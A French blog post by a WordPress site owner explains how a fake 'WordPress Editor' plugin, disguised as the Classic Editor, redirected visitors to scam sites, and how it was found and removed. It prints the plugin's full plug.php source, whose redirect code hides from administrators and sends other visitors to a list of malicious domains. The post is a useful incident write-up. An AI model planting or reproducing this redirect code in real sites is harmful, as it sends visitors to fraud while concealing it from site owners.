Piratage du site
Plusieurs de mes sites réalisés à l’aide de la plateforme WordPress ont été attaqués cette semaine, probablement en raison d’une faille de sécurité chez l’hébergeur que j’utilise (OVH), qui s’est dégagé de toute responsabilité. Les sites attaqués ont présenté le comportement suivant:
- Lorsque vous accédez pour la première fois à une page du site, elle s’ouvre parfaitement et les liens sont parfaits. Si vous survolez les liens, les adresses sont correctes.
- En cliquant sur un lien, l’utilisateur est dirigé vers un site frauduleux:
site frauduleux
Le fournisseur en question a affirmé avoir passé un outil d’analyse sur les domaines qui ont été compromis et n’a trouvé aucun fichier malveillant, ce qui m’a pris la peine d’analyser quels ou quels fichiers avaient été compromis lors de l’attaque.
Dans un premier temps, j’ai désactivé tous les plugins. Ce faisant, la redirection vers le site d’escroquerie a cessé de se produire, ce qui a réduit la zone à enquêter.
Suivant la même philosophie, j’activais plugin par plugin jusqu’à ce que je vois le moment où l’échec reviendrait. Cela s’est produit lors de l’activation du plugin WordPress Editor , qui, théoriquement, sert à activer l’éditeur WordPress classique, celui qui était utilisé avant la mise à jour de Gutemberg qui a amené le nouvel éditeur sous forme de blocs.
Le malware passe inaperçu dans la liste des plugins car sa description est la même que la description de «l’éditeur classique», induisant une erreur de l’administrateur du site.
L’éditeur classique d’origine est répertorié sous le nom «Classic Editor» ou, en anglais, «Classic Editor». Il se trouve dans le dossier «/ wp-content / plugins / classic-editor» et son code de programmation comporte 954 lignes, ne ressemblant en rien au malware mentionné ci-dessus.
Solution:
Cela dit, la solution au problème était très simple: il suffisait de supprimer le plugin WordPress Editor et le fichier plug.php qui était corrompu (pour le savoir il suffit de chercher grâce à filezilla tous les fichiers récent et la bingo un fichier tout neuf alors que j’ai pas fait d’update depuis longtemps.
voici le fichier plug.php :
<?php
/*
Plugin Name: WordPress Editor
Plugin URI: https://wp.com
Description: Enables the WordPress classic editor and the old-style Edit Post screen with TinyMCE, Meta Boxes, etc. Supports the older plugins that extend this screen.
Version: 5.0.0
Author: WordPress
Author URI: https://wp.com
License: GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/
// FIX LOGIN PAGE
function is_login_page() {
return in_array($GLOBALS[‘pagenow’], array(‘wp-login.php’, ‘wp-register.php’));
}
function my_function() {
$is_admin = current_user_can( ‘manage_options’ );
$ref = $_SERVER[‘HTTP_REFERER’];
// LINKS (NDLR lien pirates)
$urls = [‘http://xn--80aj6ah1a.xn--p1ai’,’http://xn--e1adtoj.xn--p1ai’,’http://xn--80azck0a.xn--p1ai’,’http://xn--90aixnm.xn--p1ai’,’http://xn--c1ae0ahg.xn--p1ai’,’http://xn--c1ab3awv.xn--p1ai’,’http://xn--e1annge.xn--p1ai’];
$url = « »;
//$url = ;
if(!$is_admin && !empty($ref) && !is_login_page()){
header(« Location: « .$urls[array_rand($urls)]);
exit();
} else{
}
}
add_action( ‘wp_loaded’, ‘my_function’ );
?>
Merci au blog: https://blog.lucianoreis.com/2021/03/02/sites-wordpress-direcionando-para-scam/
Laisser un commentaire